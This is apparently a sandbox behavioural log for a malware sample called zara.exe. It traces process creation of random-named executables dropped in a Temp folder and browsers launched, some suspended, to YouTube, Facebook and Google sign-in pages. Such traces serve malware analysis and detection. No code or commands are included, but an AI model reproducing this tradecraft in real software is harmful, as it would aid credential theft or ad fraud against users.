CreateProcessInternalW Feb. 13, 2024, 12:17 p.m.	thread_identifier: 648 thread_handle: 0x00000734 process_identifier: 504 current_directory: C:\Users\test22\AppData\Local\Temp\heidinwBI5Bnh48LP filepath: C:\Users\test22\AppData\Local\Temp\heidinwBI5Bnh48LP\H86W_nRG_QiDnpacl1Q7.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\heidinwBI5Bnh48LP\H86W_nRG_QiDnpacl1Q7.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\heidinwBI5Bnh48LP\H86W_nRG_QiDnpacl1Q7.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000740	1	1
CreateProcessInternalW Feb. 13, 2024, 12:18 p.m.	thread_identifier: 2308 thread_handle: 0x00000734 process_identifier: 2296 current_directory: C:\Users\test22\AppData\Local\Temp\heidinwBI5Bnh48LP filepath: C:\Users\test22\AppData\Local\Temp\heidinwBI5Bnh48LP\48GAGLpHe8SfQaAeuUjD.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\heidinwBI5Bnh48LP\48GAGLpHe8SfQaAeuUjD.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\heidinwBI5Bnh48LP\48GAGLpHe8SfQaAeuUjD.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000073c	1	1
CreateProcessInternalW Feb. 13, 2024, 12:18 p.m.	thread_identifier: 2000 thread_handle: 0x00000740 process_identifier: 1320 current_directory: C:\Users\test22\AppData\Local\Temp\heidinwBI5Bnh48LP filepath: C:\Users\test22\AppData\Local\Temp\heidinwBI5Bnh48LP\Ji6eSDaqEh9J_LBdm7Gg.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\heidinwBI5Bnh48LP\Ji6eSDaqEh9J_LBdm7Gg.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\heidinwBI5Bnh48LP\Ji6eSDaqEh9J_LBdm7Gg.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000748	1	1
CreateProcessInternalW Feb. 13, 2024, 12:18 p.m.	thread_identifier: 1080 thread_handle: 0x00000734 process_identifier: 2744 current_directory: C:\Users\test22\AppData\Local\Temp\heidinwBI5Bnh48LP filepath: C:\Users\test22\AppData\Local\Temp\heidinwBI5Bnh48LP\bBd0YznJ45TDQR7kIkRA.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\heidinwBI5Bnh48LP\bBd0YznJ45TDQR7kIkRA.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\heidinwBI5Bnh48LP\bBd0YznJ45TDQR7kIkRA.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000744	1	1
CreateProcessInternalW Feb. 13, 2024, 12:18 p.m.	thread_identifier: 1272 thread_handle: 0x00000740 process_identifier: 1512 current_directory: C:\Users\test22\AppData\Local\Temp\heidinwBI5Bnh48LP filepath: C:\Users\test22\AppData\Local\Temp\heidinwBI5Bnh48LP\zdsQt76OWN37K50HOTgL.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\heidinwBI5Bnh48LP\zdsQt76OWN37K50HOTgL.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\heidinwBI5Bnh48LP\zdsQt76OWN37K50HOTgL.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000073c	1	1
CreateProcessInternalW Feb. 13, 2024, 12:17 p.m.	thread_identifier: 1120 thread_handle: 0x000001d4 process_identifier: 1216 current_directory: C:\Users\test22\AppData\Local\Temp\heidinwBI5Bnh48LP filepath: C:\Program Files (x86)\Internet Explorer\iexplore.exe track: 1 command_line: "C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome filepath_r: C:\Program Files (x86)\Internet Explorer\iexplore.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000001d0	1	1
NtResumeThread Feb. 13, 2024, 12:17 p.m.	thread_handle: 0x00000264 suspend_count: 1 process_identifier: 3028	1	0
CreateProcessInternalW Feb. 13, 2024, 12:18 p.m.	thread_identifier: 2904 thread_handle: 0x000002c8 process_identifier: 2876 current_directory: C:\Users\test22\AppData\Local\Temp\heidinwBI5Bnh48LP filepath: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe track: 1 command_line: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" https://www.youtube.com filepath_r: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000002d4	1	1
NtResumeThread Feb. 13, 2024, 12:18 p.m.	thread_handle: 0x000002c8 suspend_count: 1 process_identifier: 2876	1	0
CreateProcessInternalW Feb. 13, 2024, 12:18 p.m.	thread_identifier: 2144 thread_handle: 0x000002c8 process_identifier: 2128 current_directory: C:\Users\test22\AppData\Local\Temp\heidinwBI5Bnh48LP filepath: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe track: 1 command_line: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" https://www.facebook.com/video filepath_r: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000002ac	1	1
NtResumeThread Feb. 13, 2024, 12:18 p.m.	thread_handle: 0x000002c8 suspend_count: 1 process_identifier: 2128	1	0
CreateProcessInternalW Feb. 13, 2024, 12:18 p.m.	thread_identifier: 2132 thread_handle: 0x000002c8 process_identifier: 2832 current_directory: C:\Users\test22\AppData\Local\Temp\heidinwBI5Bnh48LP filepath: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe track: 1 command_line: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" https://accounts.google.com filepath_r: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000002dc	1	1
NtResumeThread Feb. 13, 2024, 12:18 p.m.	thread_handle: 0x000002c8 suspend_count: 1 process_identifier: 2832	1	0
CreateProcessInternalW Feb. 13, 2024, 12:18 p.m.	thread_identifier: 3252 thread_handle: 0x00000270 process_identifier: 3248 current_directory: C:\Users\test22\AppData\Local\Temp\heidinwBI5Bnh48LP filepath: C:\Program Files\Mozilla Firefox\firefox.exe track: 1 command_line: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com filepath_r: C:\Program Files\Mozilla Firefox\firefox.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000002d4	1	1
NtResumeThread Feb. 13, 2024, 12:18 p.m.	thread_handle: 0x00000270 suspend_count: 1 process_identifier: 3248	1	0
CreateProcessInternalW Feb. 13, 2024, 12:18 p.m.	thread_identifier: 3456 thread_handle: 0x000002b0 process_identifier: 3452 current_directory: C:\Users\test22\AppData\Local\Temp\heidinwBI5Bnh48LP filepath: C:\Program Files\Mozilla Firefox\firefox.exe track: 1 command_line: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/video filepath_r: C:\Program Files\Mozilla Firefox\firefox.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000002e4	1	1
NtResumeThread Feb. 13, 2024, 12:18 p.m.	thread_handle: 0x000002b0 suspend_count: 1 process_identifier: 3452	1	0
CreateProcessInternalW Feb. 13, 2024, 12:18 p.m.	thread_identifier: 3720 thread_handle: 0x000001a8 process_identifier: 3716 current_directory: C:\Users\test22\AppData\Local\Temp\heidinwBI5Bnh48LP filepath: C:\Program Files\Mozilla Firefox\firefox.exe track: 1 command_line: "C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com filepath_r: C:\Program Files\Mozilla Firefox\firefox.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000294	1	1
NtResumeThread Feb. 13, 2024, 12:18 p.m.	thread_handle: 0x000001a8 suspend_count: 1 process_identifier: 3716	1	0
NtResumeThread Feb. 13, 2024, 12:17 p.m.	thread_handle: 0x00000214 suspend_count: 1 process_identifier: 1216	1	0
CreateProcessInternalW Feb. 13, 2024, 12:17 p.m.	thread_identifier: 2112 thread_handle: 0x00000340 process_identifier: 2104 current_directory: filepath: track: 1 command_line: "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:1216 CREDAT:145409 filepath_r: stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000344	1	1
NtResumeThread Feb. 13, 2024, 12:17 p.m.	thread_handle: 0x00000340 suspend_count: 1 process_identifier: 2104	1	0
NtResumeThread Feb. 13, 2024, 12:17 p.m.	thread_handle: 0x00000410 suspend_count: 1 process_identifier: 1216	1	0
NtResumeThread Feb. 13, 2024, 12:17 p.m.	thread_handle: 0x00000290 suspend_count: 1 process_identifier: 1216	1	0
NtGetContextThread Feb. 13, 2024, 12:19 p.m.	thread_handle: 0x000005c4	1	0
NtResumeThread Feb. 13, 2024, 12:17 p.m.	thread_handle: 0x000001f8 suspend_count: 1 process_identifier: 2104	1	0
NtResumeThread Feb. 13, 2024, 12:17 p.m.	thread_handle: 0x00000230 suspend_count: 1 process_identifier: 2104	1	0
NtResumeThread Feb. 13, 2024, 12:17 p.m.	thread_handle: 0x00000248 suspend_count: 1 process_identifier: 2104	1	0
NtResumeThread Feb. 13, 2024, 12:17 p.m.	thread_handle: 0x000005e0 suspend_count: 1 process_identifier: 2104	1	0
NtResumeThread Feb. 13, 2024, 12:18 p.m.	thread_handle: 0x000001e4 suspend_count: 1 process_identifier: 504	1	0
NtResumeThread Feb. 13, 2024, 12:18 p.m.	thread_handle: 0x000001d4 suspend_count: 1 process_identifier: 2296	1	0
NtResumeThread Feb. 13, 2024, 12:18 p.m.	thread_handle: 0x00000244 suspend_count: 1 process_identifier: 2296	1	0
NtResumeThread Feb. 13, 2024, 12:18 p.m.	thread_handle: 0x00000284 suspend_count: 1 process_identifier: 2296	1	0
NtResumeThread Feb. 13, 2024, 12:18 p.m.	thread_handle: 0x00000130 suspend_count: 1 process_identifier: 1320	1	0
NtResumeThread Feb. 13, 2024, 12:18 p.m.	thread_handle: 0x000001b0 suspend_count: 1 process_identifier: 1320	1	0
NtResumeThread Feb. 13, 2024, 12:18 p.m.	thread_handle: 0x00000214 suspend_count: 1 process_identifier: 2744	1	0
NtResumeThread Feb. 13, 2024, 12:18 p.m.	thread_handle: 0x00000280 suspend_count: 1 process_identifier: 1512	1	0
CreateProcessInternalW Feb. 13, 2024, 12:18 p.m.	thread_identifier: 1976 thread_handle: 0x000002a4 process_identifier: 1864 current_directory: C:\Users\test22\AppData\Local\Temp\heidinwBI5Bnh48LP filepath: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe track: 1 command_line: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" https://accounts.google.com filepath_r: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000002ac	1	1
NtResumeThread Feb. 13, 2024, 12:18 p.m.	thread_handle: 0x000002a4 suspend_count: 1 process_identifier: 1864	1	0
CreateProcessInternalW Feb. 13, 2024, 12:18 p.m.	thread_identifier: 2408 thread_handle: 0x0000000000000098 process_identifier: 2436 current_directory: filepath: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe track: 1 command_line: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef3eef1e8,0x7fef3eef1f8,0x7fef3eef208 filepath_r: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x000000000000009c	1	1
CreateProcessInternalW Feb. 13, 2024, 12:18 p.m.	thread_identifier: 1596 thread_handle: 0x0000000000000144 process_identifier: 2776 current_directory: filepath: track: 1 command_line: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=1976 --on-initialized-event-handle=316 --parent-handle=320 /prefetch:6 filepath_r: stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000148	1	1
NtResumeThread Feb. 13, 2024, 12:18 p.m.	thread_handle: 0x0000000000000210 suspend_count: 1 process_identifier: 1864	1	0
CreateProcessInternalW Feb. 13, 2024, 12:18 p.m.	thread_identifier: 3192 thread_handle: 0x000000000000059c process_identifier: 3188 current_directory: filepath: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe track: 1 command_line: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1264,15813997844083060191,16272780546978488754,131072 --gpu-preferences=KAAAAAAAAAAABwAAAQAAAAAAAAAAAGAAAQAAAAAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x80ee --gpu-device-id=0xbeef --gpu-driver-vendor=Microsoft --gpu-driver-version=6.1.7600.16385 --gpu-driver-date=6-21-2006 --service-request-channel-token=8C5DFA1F846549C3894CCD4AE0BFF4B0 --mojo-platform-channel-handle=1276 --ignored=" --type=renderer " /prefetch:2 filepath_r: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe stack_pivoted: 0 creation_flags: 17302540 (CREATE_BREAKAWAY_FROM_JOB\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|DETACHED_PROCESS\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000000000005fc	1	1
NtResumeThread Feb. 13, 2024, 12:18 p.m.	thread_handle: 0x00000000000000d4 suspend_count: 1 process_identifier: 2436	1	0

zara.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All